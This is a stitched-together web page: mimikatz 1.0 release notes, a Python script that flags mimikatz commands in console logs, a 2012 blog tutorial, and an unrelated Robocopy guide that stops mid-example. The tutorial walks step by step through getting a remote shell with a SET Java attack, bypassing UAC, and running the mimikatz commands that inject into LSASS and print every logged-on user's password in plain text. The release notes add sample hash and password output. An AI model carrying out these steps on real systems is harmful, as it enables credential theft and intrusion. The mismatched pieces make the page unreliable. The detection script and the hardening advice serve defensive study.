mimikatz

mimikatz 1.0 has just been released as an alpha beta RC!

For those in a hurry looking for passwords…

Run as administrator:

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
...

Modules

mimikatz is now organized around local modules:

  • "standard" ; basic commands
  • crypto ; Cryptography and certificates
  • sekurlsa ; Dumping of Windows hashes and passwords
  • system ; System management
  • process ; Process manipulation
  • thread ; Thread manipulation
  • service ; Service manipulation
  • privilege ; Privilege manipulation
  • winmine ; Manipulation of the Windows XP Minesweeper (demonstration)
  • minesweeper ; Manipulation of the Windows Vista and 7 Minesweeper (demonstration)
  • nogpo ; To get around a few trivial GPOs
  • samdump ; Offline SAM dump
  • inject ; Library injector
  • ts ; Terminal Server manipulation
  • divers ; Miscellaneous functions too small to stand on their own

Except for the « standard » module, the module and the function being called are separated with the :: separator.
Example: inject::process lsass.exe sekurlsa.dll

Libraries

It is not necessarily the most discreet approach, but I like injecting libraries

  • sekurlsa ; manipulation of security data in LSASS
  • klock ; desktop manipulation
  • kelloworld ; library to inject, as an example

Driver

Being an administrator is not always enough; it can also be useful to have an entry point in user mode.
A driver, mimikatz.sys, is therefore available.

Remote commands can be called by prefixing them with:

  • @ for libraries (@ alone closes the connection to the library and unloads it)
  • ! for the mimikatz driver (! alone closes the connection to the driver)
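The command syntax described above (the :: separator between module and function, and the @ and ! prefixes for library and driver commands) is enough to recognise mimikatz 1.0 commands in a captured console transcript. The following Python triage is an added example, not part of mimikatz or of the original post; the function names and the HIGH_RISK set are assumptions chosen for illustration.

```python
import re
from typing import List, NamedTuple, Optional

# Local modules listed on this page ("standard" commands carry no prefix).
MODULES = {"crypto", "sekurlsa", "system", "process", "thread", "service",
           "privilege", "winmine", "minesweeper", "nogpo", "samdump",
           "inject", "ts", "divers"}
# Assumption: modules an analyst escalates on (not defined by the page).
HIGH_RISK = {"sekurlsa", "samdump", "inject", "privilege"}
PROMPT = re.compile(r"^\s*mimikatz\s*#\s*", re.IGNORECASE)

class Command(NamedTuple):
    target: str              # "local", "library" (@ prefix) or "driver" (! prefix)
    module: Optional[str]    # None for remote commands
    function: str            # "<close>" when the prefix is used alone
    args: List[str]

def parse(line: str) -> Optional[Command]:
    """Return the mimikatz 1.0 command on this line, or None if there is none."""
    prompted = PROMPT.match(line) is not None
    text = PROMPT.sub("", line).strip()
    if not text:
        return None
    # @ and ! are common in other shells, so only trust them after the prompt.
    if prompted and text[0] in "@!":
        target = "library" if text[0] == "@" else "driver"
        parts = text[1:].split()
        return Command(target, None, parts[0] if parts else "<close>", parts[1:])
    head, *args = text.split()
    module, sep, function = head.partition("::")
    if not sep or not function or module.lower() not in MODULES:
        return None
    return Command("local", module.lower(), function, args)

def triage(lines: List[str]):
    """Return (line number, 'high' or 'info', Command) for each recognised command."""
    findings = []
    for number, line in enumerate(lines, 1):
        cmd = parse(line)
        if cmd is not None:
            touches_lsass = any(a.lower() == "lsass.exe" for a in cmd.args)
            high = cmd.target != "local" or cmd.module in HIGH_RISK or touches_lsass
            findings.append((number, "high" if high else "info", cmd))
    return findings

# Constructed sample transcript; the commands are the ones quoted on this page.
SAMPLE = ["mimikatz # privilege::debug",
          "mimikatz # inject::process lsass.exe sekurlsa.dll",
          "mimikatz # @getLogonPasswords"]
```

Calling triage(SAMPLE) labels all three lines as high; text that merely contains :: or @, such as C++ source or a batch file, is ignored.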

Remotely Recovering Windows Passwords in Plain Text

There has been a lot of buzz across the web the last few months about a program called “Mimikatz”. It is an interesting program that allows you to recover Windows passwords from a system in clear text. Why spend hours, days, or months trying to crack a complex password when you can just pull it from Windows memory as unencrypted text?

We have seen in the past that most Windows passwords less than 15 characters can be cracked in just a few seconds if the attacker can get the Windows hashes. This is because Windows stores these passwords in an easy-to-crack LM hash, an old encryption used for backwards compatibility. Microsoft allows you to disable the older LM hash, but as Mike Pilkington discusses on the SANS blog, Microsoft still creates the hash and stores it in memory.

No big deal, just make your passwords 15 characters or greater and problem solved. The LM hash will not be created, only the more secure NTLM hash. Well, not so fast. It seems that the LM hash is not the only version of the passwords Windows keeps in memory; it also keeps a copy of the passwords in plain text.

Which you can even recover remotely…

Pauldotcom.com has a great article explaining how to use Mimikatz to recover remote passwords. In this example, I used the website Java attack through the Social Engineering Toolkit (SET) to obtain a remote shell. First thing you will want to do is download Mimikatz and place the files you need (Windows 32 or 64 bit) in a directory on your Backtrack system. Then run SET and pick the website java attack option.

After the target system surfs to our SET webpage and allows the Java code to run, we get a remote shell. After we connect to the created session, we will need to elevate our authority level. We need System level privileges for Mimikatz to work properly, so the first thing to do is run the Bypass UAC script in Meterpreter, and then connect to the newly created session, in this instance session 3:

Now all we need to do is create a directory on the target system and copy the Mimikatz files up to it:

Now we need to drop to a command shell and run “Mimikatz”.

You will now be in the Mimikatz program console and need to enter the commands “privilege::debug” and then “inject::process lsass.exe sekurlsa.dll”:

If you get an error at this point (Yeah I know, it is all in French), you probably don’t have System level authority.

Okay, if all went well, you need to run one last command, “@getLogonPasswords”:

And that is it! The passwords for anyone who has logged onto this machine will be displayed in plain text. From the picture above you can see two users:

Username: Fred
Password: password

Okay, not a complex (or smart) password, but look at the other user:

Username: Secure_User
Password: CvM*901D0?#(Fg[“MNoP43!Ta$cv2%

Wow, wouldn’t want to have to type that one in every day. That is a 30 character password and Mimikatz recovered and displayed it in plain text with no need to decrypt or crack.

The moral of this story boys and girls is to not allow scripts or programs to run from websites that you do not know or trust. Run a browser script blocking program like NoScript. Also, do not allow your Windows 7 users to use Administrator level accounts. Drop them down to User accounts for their everyday usage.

As always, do not access systems that you do not have permission to access. And always do your penetration testing learning on test machines and not on live production systems.

 

~ by D. Dieterle on April 16, 2012.

Posted in Computer Security

How to use Robocopy command to copy folders and contents

Robocopy (Robust File Copy) is a command-line file copying tool in Windows Vista. Although Robocopy has been available for free as part of the downloadable Windows Resource Kit since Windows NT 4.0, it was never an official feature of the operating system until the arrival of Vista. Unlike other built-in file copying commands such as Copy and XCopy, Robocopy is designed for reliable copying or mirroring of entire folders of any size. During the copy it can preserve NTFS ACLs, attributes, owner information, alternate data streams, auditing information, timestamps and properties; security information is not copied unless explicitly requested with the /COPYALL switch.

Best of all, Robocopy works over network connections that are subject to disruption or outages, thanks to its resume feature, and it has a progress indicator on the command line that is useful when copying large files.

Robocopy Syntax

ROBOCOPY source destination [file [file]…] [options]

where source is the Source Directory (drive:\path or \\server\share\path), destination is the Destination Directory (drive:\path or \\server\share\path) and file is the File(s) to copy, where names or wildcards can be specified and the default is “*.*” (all files).

Robocopy Options and Switches

Copy options :
/S :: copy Subdirectories, but not empty ones.
/E :: copy subdirectories, including Empty ones.
/LEV:n :: only copy the top n LEVels of the source directory tree.
/Z :: copy files in restartable mode.
/B :: copy files in Backup mode.
/ZB :: use restartable mode; if access denied use Backup mode.
/EFSRAW :: copy all encrypted files in EFS RAW mode.
/COPY:copyflag[s] :: what to COPY for files (default is /COPY:DAT).
(copyflags : D=Data, A=Attributes, T=Timestamps).
(S=Security=NTFS ACLs, O=Owner info, U=aUditing info).
/DCOPY:T :: COPY Directory Timestamps.
/SEC :: copy files with SECurity (equivalent to /COPY:DATS).
/COPYALL :: COPY ALL file info (equivalent to /COPY:DATSOU).
/NOCOPY :: COPY NO file info (useful with /PURGE).
/SECFIX :: FIX file SECurity on all files, even skipped files.
/TIMFIX :: FIX file TIMes on all files, even skipped files.
/PURGE :: delete dest files/dirs that no longer exist in source.
/MIR :: MIRror a directory tree (equivalent to /E plus /PURGE).
/MOV :: MOVe files (delete from source after copying).
/MOVE :: MOVE files AND dirs (delete from source after copying).

Examples:

Using Robocopy is simple, much like using the Copy and Xcopy commands. For example, to copy the entire folder C:\Users to C:\UserBackup, simply type:

Robocopy C:\Users C:\UserBackup